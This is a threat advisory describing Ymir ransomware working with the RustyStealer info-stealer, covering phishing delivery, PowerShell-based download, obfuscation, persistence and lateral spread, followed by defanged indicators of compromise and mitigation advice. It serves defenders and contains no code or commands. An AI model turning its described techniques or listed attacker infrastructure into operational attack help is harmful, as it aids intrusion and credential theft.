Ymir and RustyStealer Malware Duo Escalates Cyber Threat Landscape

Ymir and RustyStealer Malware Duo Escalates Cyber Threat Landscape

Threat Group: Unidentified Threat Actor
Threat Type: Ransomware, Info-Stealer
Exploited Vulnerabilities: Common file encryption mechanisms, credential theft techniques
Malware Used: Ymir Ransomware, RustyStealer
Threat Score: High (8.2/10) — Due to its dual-impact functionality that combines data theft with ransomware encryption.
Last Threat Observation: November 10, 2024


Overview

A newly identified ransomware variant, dubbed Ymir, has emerged in the cyber landscape, working in tandem with RustyStealer malware to maximize damage and data exploitation. First observed in early November 2024, this pairing enables attackers to both lock down systems and exfiltrate sensitive data, posing severe risks to businesses, individuals, and public sector entities. Ymir’s encryption disrupts operations, while RustyStealer collects valuable credentials and system data, broadening the threat actor's potential for further exploitation.

Key Details

  • Delivery Method: Primarily through phishing emails containing malicious links or attachments.
  • Target: Organizations with sensitive data and networked environments.
  • Functions:
    • Data Encryption: Ymir encrypts critical files, making them inaccessible.
    • Credential Theft: RustyStealer collects login credentials and system information.
    • Network Propagation: Ymir spreads through networked systems.
    • Persistence: Uses techniques to stay active on infected systems.
    • PowerShell Exploitation: Employs PowerShell scripts for execution, evasion, and spread.

How It Infects the System

Ymir ransomware and RustyStealer often start with phishing emails designed to trick users into clicking on malicious links or opening infected attachments, such as Office documents or PDFs. Once the file is opened, it may automatically run a script or direct the user to download the malware, allowing both Ymir and RustyStealer to install on the system.

After gaining entry, these malware types exploit PowerShell, a Windows scripting tool, to execute commands, download additional malware, and move laterally across the network. PowerShell is powerful and easily hidden, which allows attackers to:

  • Download and Execute Malware: PowerShell commands are used to download Ymir and RustyStealer from remote servers, making the infection "fileless" and harder to detect by antivirus tools.
  • Evasion through Obfuscation: Attackers disguise PowerShell commands to bypass security tools, often encoding them in ways that make detection more challenging.
  • Establish Persistence: PowerShell is used to set up scheduled tasks or registry entries, making sure the malware remains active even after a reboot.
  • Spread within Networks: PowerShell’s remote capabilities allow Ymir to spread to other devices, amplifying the ransomware's impact across connected systems.

Attack Vectors

The Ymir and RustyStealer malware combination primarily infiltrates networks through phishing emails with malicious attachments or links. Upon activation, RustyStealer immediately begins gathering sensitive data, such as login credentials and system details. Once this data is extracted, Ymir ransomware initiates file encryption, rendering local data inaccessible. The dual malware setup allows attackers to leverage both immediate and long-term threats, from credential compromise to prolonged operational downtime.

Known Indicators of Compromise (IoCs)

MD5 File Hashes

  • 12acbb05741a218a1c83eaa1cfc2401f
  • 39df773139f505657d11749804953be5
  • 5384d704fadf229d08eab696404cbba6
  • 5ee1befc69d120976a60a97d3254e9eb

SHA1 File Hashes

  • 3648359ebae8ce7cacae1e631103659f5a8c630e
  • 8287d54c83db03b8adcdf1409f5d1c9abb1693ac
  • e6c4d3e360a705e272ae0b505e58e3d928fb1387
  • f954d1b1d13a5e4f62f108c9965707a2aa2a3c89
  • fe6de75d6042de714c28c0a3c0816b37e0fa4bb3

SHA256 File Hashes

  • 51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03
  • 8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c
  • b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a
  • cb88edd192d49db12f444f764c3bdc287703666167a4ca8d533d51f86ba428d8

IPv4 Addresses

  • 5[.]255[.]117[.]134
  • 74[.]50[.]84[.]181
  • 85[.]239[.]61[.]60
  • 94[.]158[.]244[.]69

URLs

  • http://5[.]255[.]117[.]134:80
  • http://74[.]50[.]84[.]181:443
  • http://94[.]158[.]244[.]69:443

Hostname

  • trojan[.]msil[.]dnoper[.]sb

Mitigation and Prevention

  • User Awareness: Conduct phishing awareness training to reduce click-through rates on malicious links.
  • Email Filtering: Implement email filtering tools to block emails with suspicious attachments and URLs.
  • Antivirus Protection: Update antivirus solutions and endpoint protection systems to recognize and respond to Ymir and RustyStealer.
  • Two-Factor Authentication (2FA): Enforce 2FA on all systems to mitigate credential theft.
  • Monitor Logs: Regularly review network and endpoint logs to identify unusual access or data transfer activity.
  • Regular Updates: Ensure that all systems, including antivirus definitions, are up to date to protect against known vulnerabilities and threat signatures.

Conclusion

The Ymir and RustyStealer malware combination represents a significant threat due to its dual capabilities of data encryption and credential theft. Organizations are advised to implement strong access controls, user awareness training, and to stay vigilant with log monitoring and regular updates. Early detection and robust email filtering are key to minimizing the risk of compromise.

Sources:

  1. The Hacker News, "New Ymir Ransomware Exploits Memory for Stealthy Attacks; Targets Corporate Networks"
  2. Rewterz, "RustyStealer and New Ymir Ransomware Collaborate in Cyberattacks – Active IOCs"
  3. Bleeping Computer, "New Ymir ransomware partners with RustyStealer in attacks,"